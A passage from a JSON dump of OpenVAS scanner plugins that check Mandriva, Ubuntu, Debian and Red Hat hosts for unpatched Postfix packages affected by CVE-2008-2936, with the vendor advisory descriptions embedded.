\"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"MNDK_2007.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"libpostfix1\", rpm:\"libpostfix1~2.3.8~1.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"postfix\", rpm:\"postfix~2.3.8~1.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"postfix-ldap\", rpm:\"postfix-ldap~2.3.8~1.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"postfix-mysql\", rpm:\"postfix-mysql~2.3.8~1.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"postfix-pcre\", rpm:\"postfix-pcre~2.3.8~1.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"postfix-pgsql\", rpm:\"postfix-pgsql~2.3.8~1.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64postfix1\", rpm:\"lib64postfix1~2.3.8~1.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"MNDK_2008.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"libpostfix1\", rpm:\"libpostfix1~2.4.5~2.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"postfix\", rpm:\"postfix~2.4.5~2.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"postfix-ldap\", rpm:\"postfix-ldap~2.4.5~2.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"postfix-mysql\", rpm:\"postfix-mysql~2.4.5~2.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"postfix-pcre\", rpm:\"postfix-pcre~2.4.5~2.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"postfix-pgsql\", rpm:\"postfix-pgsql~2.4.5~2.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64postfix1\", rpm:\"lib64postfix1~2.4.5~2.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"MNDK_2008.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"libpostfix1\", rpm:\"libpostfix1~2.5.1~2.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"postfix\", rpm:\"postfix~2.5.1~2.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"postfix-ldap\", rpm:\"postfix-ldap~2.5.1~2.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"postfix-mysql\", rpm:\"postfix-mysql~2.5.1~2.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"postfix-pcre\", rpm:\"postfix-pcre~2.5.1~2.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"postfix-pgsql\", rpm:\"postfix-pgsql~2.5.1~2.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64postfix1\", rpm:\"lib64postfix1~2.5.1~2.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 6.2, "vector": "AV:LOCAL/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-04T11:28:26", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-2936"], "description": "Ubuntu Update for Linux kernel vulnerabilities USN-636-1", "modified": "2017-12-01T00:00:00", "published": "2009-03-23T00:00:00", "id": "OPENVAS:840190", "href": "http://plugins.openvas.org/nasl.php?oid=840190", "type": "openvas", "title": "Ubuntu Update for postfix vulnerability USN-636-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_636_1.nasl 7969 2017-12-01 09:23:16Z santu $\n#\n# Ubuntu Update for postfix vulnerability USN-636-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Sebastian Krahmer discovered that Postfix was not correctly handling\n mailbox ownership when dealing with Linux's implementation of hardlinking\n to symlinks. In certain mail spool configurations, a local attacker\n could exploit this to append data to arbitrary files as the root user.\n The default Ubuntu configuration was not vulnerable.\";\n\ntag_summary = \"Ubuntu Update for Linux kernel vulnerabilities USN-636-1\";\ntag_affected = \"postfix vulnerability on Ubuntu 6.06 LTS ,\n Ubuntu 7.04 ,\n Ubuntu 7.10 ,\n Ubuntu 8.04 LTS\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-636-1/\");\n script_id(840190);\n script_version(\"$Revision: 7969 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-01 10:23:16 +0100 (Fri, 01 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-03-23 10:59:50 +0100 (Mon, 23 Mar 2009)\");\n script_tag(name:\"cvss_base\", value:\"6.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:H/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"USN\", value: \"636-1\");\n script_cve_id(\"CVE-2008-2936\");\n script_name( \"Ubuntu Update for postfix vulnerability USN-636-1\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU6.06 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"postfix-ldap\", ver:\"2.2.10-1ubuntu0.2\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postfix-mysql\", ver:\"2.2.10-1ubuntu0.2\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postfix-pcre\", ver:\"2.2.10-1ubuntu0.2\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postfix-pgsql\", ver:\"2.2.10-1ubuntu0.2\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postfix\", ver:\"2.2.10-1ubuntu0.2\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postfix-dev\", ver:\"2.2.10-1ubuntu0.2\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postfix-doc\", ver:\"2.2.10-1ubuntu0.2\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU7.04\")\n{\n\n if ((res = isdpkgvuln(pkg:\"postfix-cdb\", ver:\"2.3.8-2ubuntu0.2\", rls:\"UBUNTU7.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postfix-ldap\", ver:\"2.3.8-2ubuntu0.2\", rls:\"UBUNTU7.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postfix-mysql\", ver:\"2.3.8-2ubuntu0.2\", rls:\"UBUNTU7.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postfix-pcre\", ver:\"2.3.8-2ubuntu0.2\", rls:\"UBUNTU7.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postfix-pgsql\", ver:\"2.3.8-2ubuntu0.2\", rls:\"UBUNTU7.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postfix\", ver:\"2.3.8-2ubuntu0.2\", rls:\"UBUNTU7.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postfix-dev\", ver:\"2.3.8-2ubuntu0.2\", rls:\"UBUNTU7.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postfix-doc\", ver:\"2.3.8-2ubuntu0.2\", rls:\"UBUNTU7.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU8.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"postfix-cdb\", ver:\"2.5.1-2ubuntu1.1\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postfix-ldap\", ver:\"2.5.1-2ubuntu1.1\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postfix-mysql\", ver:\"2.5.1-2ubuntu1.1\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postfix-pcre\", ver:\"2.5.1-2ubuntu1.1\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postfix-pgsql\", ver:\"2.5.1-2ubuntu1.1\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postfix\", ver:\"2.5.1-2ubuntu1.1\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postfix-dev\", ver:\"2.5.1-2ubuntu1.1\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postfix-doc\", ver:\"2.5.1-2ubuntu1.1\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU7.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"postfix-cdb\", ver:\"2.4.5-3ubuntu1.2\", rls:\"UBUNTU7.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postfix-ldap\", ver:\"2.4.5-3ubuntu1.2\", rls:\"UBUNTU7.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postfix-mysql\", ver:\"2.4.5-3ubuntu1.2\", rls:\"UBUNTU7.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postfix-pcre\", ver:\"2.4.5-3ubuntu1.2\", rls:\"UBUNTU7.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postfix-pgsql\", ver:\"2.4.5-3ubuntu1.2\", rls:\"UBUNTU7.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postfix\", ver:\"2.4.5-3ubuntu1.2\", rls:\"UBUNTU7.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postfix-dev\", ver:\"2.4.5-3ubuntu1.2\", rls:\"UBUNTU7.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postfix-doc\", ver:\"2.4.5-3ubuntu1.2\", rls:\"UBUNTU7.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 6.2, "vector": "AV:LOCAL/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-09T11:41:24", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-2936"], "description": "Check for the Version of postfix", "modified": "2018-04-06T00:00:00", "published": "2009-04-09T00:00:00", "id": "OPENVAS:1361412562310830713", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310830713", "type": "openvas", "title": "Mandriva Update for postfix MDVSA-2008:171 (postfix)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for postfix MDVSA-2008:171 (postfix)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Sebastian Krahmer of the SUSE Security Team discovered a flaw in\n the way Postfix dereferenced symbolic links. If a local user had\n write access to a mail spool directory without a root mailbox file,\n it could be possible for them to append arbitrary data to files that\n root had write permissions to (CVE-2008-2936).\n\n The updated packages have been patched to correct this issue.\";\n\ntag_affected = \"postfix on Mandriva Linux 2007.1,\n Mandriva Linux 2007.1/X86_64,\n Mandriva Linux 2008.0,\n Mandriva Linux 2008.0/X86_64,\n Mandriva Linux 2008.1,\n Mandriva Linux 2008.1/X86_64\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.mandriva.com/security-announce/2008-08/msg00014.php\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.830713\");\n script_version(\"$Revision: 9370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-04-09 14:18:58 +0200 (Thu, 09 Apr 2009)\");\n script_tag(name:\"cvss_base\", value:\"6.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:H/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"MDVSA\", value: \"2008:171\");\n script_cve_id(\"CVE-2008-2936\");\n script_name( \"Mandriva Update for postfix MDVSA-2008:171 (postfix)\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of postfix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"MNDK_2007.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"libpostfix1\", rpm:\"libpostfix1~2.3.8~1.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"postfix\", rpm:\"postfix~2.3.8~1.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"postfix-ldap\", rpm:\"postfix-ldap~2.3.8~1.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"postfix-mysql\", rpm:\"postfix-mysql~2.3.8~1.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"postfix-pcre\", rpm:\"postfix-pcre~2.3.8~1.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"postfix-pgsql\", rpm:\"postfix-pgsql~2.3.8~1.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64postfix1\", rpm:\"lib64postfix1~2.3.8~1.1mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"MNDK_2008.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"libpostfix1\", rpm:\"libpostfix1~2.4.5~2.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"postfix\", rpm:\"postfix~2.4.5~2.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"postfix-ldap\", rpm:\"postfix-ldap~2.4.5~2.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"postfix-mysql\", rpm:\"postfix-mysql~2.4.5~2.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"postfix-pcre\", rpm:\"postfix-pcre~2.4.5~2.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"postfix-pgsql\", rpm:\"postfix-pgsql~2.4.5~2.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64postfix1\", rpm:\"lib64postfix1~2.4.5~2.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"MNDK_2008.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"libpostfix1\", rpm:\"libpostfix1~2.5.1~2.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"postfix\", rpm:\"postfix~2.5.1~2.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"postfix-ldap\", rpm:\"postfix-ldap~2.5.1~2.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"postfix-mysql\", rpm:\"postfix-mysql~2.5.1~2.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"postfix-pcre\", rpm:\"postfix-pcre~2.5.1~2.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"postfix-pgsql\", rpm:\"postfix-pgsql~2.5.1~2.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64postfix1\", rpm:\"lib64postfix1~2.5.1~2.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 6.2, "vector": "AV:LOCAL/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:49:48", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-2936"], "description": "The remote host is missing an update to postfix\nannounced via advisory DSA 1629-2.", "modified": "2017-07-07T00:00:00", "published": "2008-09-04T00:00:00", "id": "OPENVAS:61435", "href": "http://plugins.openvas.org/nasl.php?oid=61435", "type": "openvas", "title": "Debian Security Advisory DSA 1629-2 (postfix)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_1629_2.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 1629-2 (postfix)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Due to a version numbering problem, the Postfix update for DSA 1629 was\nnot installable on the i386 (Intel ia32) architecture. This update\nincreases the version number to make it installable on i386 as well.\nFor reference the original advisory text is below.\n\nSebastian Krahmer discovered that Postfix, a mail transfer agent,\nincorrectly checks the ownership of a mailbox. In some configurations,\nthis allows for appending data to arbitrary files as root.\n\nNote that only specific configurations are vulnerable; the default\nDebian installation is not affected. Only a configuration meeting\nthe following requirements is vulnerable:\n* The mail delivery style is mailbox, with the Postfix built-in\nlocal(8) or virtual(8) delivery agents.\n* The mail spool directory (/var/spool/mail) is user-writeable.\n* The user can create hardlinks pointing to root-owned symlinks\nlocated in other directories.\n\nFor a detailed treating of the issue, please refer to the upstream\nauthor's announcement:\nhttp://article.gmane.org/gmane.mail.postfix.announce/110\n\nFor the stable distribution (etch), this problem has been fixed in\nversion 2.3.8-2+etch1.\n\nFor the testing distribution (lenny), this problem has been fixed in\nversion 2.5.2-2lenny1.\n\nFor the unstable distribution (sid), this problem has been fixed\nin version 2.5.4-1.\n\nWe recommend that you upgrade your postfix package.\";\ntag_summary = \"The remote host is missing an update to postfix\nannounced via advisory DSA 1629-2.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201629-2\";\n\n\nif(description)\n{\n script_id(61435);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-04 17:00:42 +0200 (Thu, 04 Sep 2008)\");\n script_cve_id(\"CVE-2008-2936\");\n script_tag(name:\"cvss_base\", value:\"6.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:H/Au:N/C:C/I:C/A:C\");\n script_name(\"Debian Security Advisory DSA 1629-2 (postfix)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"postfix-doc\", ver:\"2.3.8-2+etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"postfix-dev\", ver:\"2.3.8-2+etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"postfix-pcre\", ver:\"2.3.8-2+etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"postfix-mysql\", ver:\"2.3.8-2+etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"postfix-cdb\", ver:\"2.3.8-2+etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"postfix\", ver:\"2.3.8-2+etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"postfix-ldap\", ver:\"2.3.8-2+etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"postfix-pgsql\", ver:\"2.3.8-2+etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 6.2, "vector": "AV:LOCAL/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-27T10:56:45", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-2936"], "description": "Check for the Version of postfix", "modified": "2017-07-12T00:00:00", "published": "2009-03-06T00:00:00", "id": "OPENVAS:870021", "href": "http://plugins.openvas.org/nasl.php?oid=870021", "type": "openvas", "title": "RedHat Update for postfix RHSA-2008:0839-01", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for postfix RHSA-2008:0839-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it 